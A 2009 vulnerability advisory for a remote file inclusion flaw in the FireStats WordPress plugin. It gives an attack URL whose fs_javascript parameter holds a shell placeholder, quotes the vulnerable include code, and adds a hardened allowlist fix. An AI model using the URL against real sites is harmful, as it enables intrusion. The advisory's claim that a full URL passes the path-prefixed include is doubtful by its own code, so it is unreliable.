=====================================================================================================================
 WordPress Plugin FireStats <= 1.6.1-stable (fs_javascript) RFI Vulnerability
=====================================================================================================================

 Author         : darkmasking
 Date           : June, 13th 2009
 Contact        : darkmasking[at]gmail.com
 Critical Level : Dangerous *red*

---------------------------------------------------------------------------------------------------------------------
 Affected software description :

 Software : FireStats Version 1.6.1-stable [FireStats is a web statistics system]
 Vendor   : http://firestats.cc/
 Price    : $25.00 ( commercial usage )
=====================================================================================================================

 [~] RFI :

 http://www.TARGET.com/[path]/wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=[darkc0de]

---------------------------------------------------------------------------------------------------------------------

 [~] Vuln : firestats-wordpress.php : Line 36

 $path = fs_get_firestats_path();
 $file = $_GET['fs_javascript'];
 unset($_GET['fs_javascript']);
 if (strpos($file,"..") !== false) die(".. is not allowed in fs_javascript");
 require_once("$path/$file");

---------------------------------------------------------------------------------------------------------------------

 [~] Vulnerability description :

 This script is vulnerable to file inclusion attacks.

 The name of the file it includes is taken directly from user-supplied data (the fs_javascript
 parameter). The only check applied is a search for "..", which does not prevent a full URL or an
 arbitrary path from being passed to require_once(); the data is therefore not properly validated
 before reaching the include function.

---------------------------------------------------------------------------------------------------------------------

 [~] How to fix this vulnerability :

 Edit the source code to ensure that input is properly validated. Where possible, it is recommended
 to make a list of accepted filenames and restrict the input to that list.

 For PHP, the option allow_url_fopen would normally allow a programmer to open, include or otherwise
 use a remote file using a URL rather than a local file path. It is recommended to disable this
 option in php.ini.

---------------------------------------------------------------------------------------------------------------------

 [~] Greetz :

 Sorry bro, no friends yet, so these go out to myself only!

=====================================================================================================================
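 The allowlist fix recommended under "How to fix" above, written out as an added example; this is
 not FireStats' own code. It assumes fs_get_firestats_path() returns the plugin's local base
 directory, as in the vulnerable snippet, and the allowlist entries are constructed placeholders.

```php
<?php
// Added example (not FireStats code): hardened replacement for the include at
// firestats-wordpress.php line 36. fs_get_firestats_path() is assumed to return
// the plugin's local base directory, as in the original snippet.

// Allowlist of script names this endpoint may include. Anything not listed is
// rejected outright, so neither a remote URL nor a path outside the plugin
// directory can ever reach require_once().
$fs_allowed_javascript = array(
    'js/firestats.js',            // constructed example entries; use the real
    'js/firestats-wordpress.js',  // file names shipped with the plugin
);

function fs_include_javascript($path, array $allowed, $requested)
{
    // Exact, type-strict allowlist match: no "..", scheme or null-byte checks
    // are needed because the value is only ever used when it matches an entry.
    if (!is_string($requested) || !in_array($requested, $allowed, true)) {
        header('HTTP/1.1 400 Bad Request');
        die('fs_javascript is not an accepted file');
    }

    // Defence in depth: resolve the final path and confirm it still lies under
    // the plugin directory, so a mistaken allowlist entry cannot escape it.
    $base = realpath($path);
    $full = realpath($path . '/' . $requested);
    if ($base === false || $full === false
        || strpos($full, $base . DIRECTORY_SEPARATOR) !== 0) {
        header('HTTP/1.1 404 Not Found');
        die('fs_javascript target not found');
    }

    require_once $full;
}

$path = fs_get_firestats_path();
$file = isset($_GET['fs_javascript']) ? $_GET['fs_javascript'] : '';
unset($_GET['fs_javascript']);
fs_include_javascript($path, $fs_allowed_javascript, $file);
```

 Note that since PHP 5.2 the setting that governs include/require of URLs is allow_url_include
 (separate from allow_url_fopen), so both should be off; the allowlist removes the dependence on
 either setting.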